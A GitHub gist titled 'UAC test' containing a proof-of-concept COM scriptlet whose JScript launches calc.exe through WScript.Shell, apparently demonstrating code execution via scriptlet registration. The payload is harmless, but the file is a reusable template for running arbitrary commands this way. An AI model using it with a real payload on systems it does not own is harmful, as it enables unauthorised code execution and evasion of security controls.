Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save InfinityDevTech/486da88d970c3679b503546676c78b3d to your computer and use it in GitHub Desktop.
Save InfinityDevTech/486da88d970c3679b503546676c78b3d to your computer and use it in GitHub Desktop.
UAC test
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment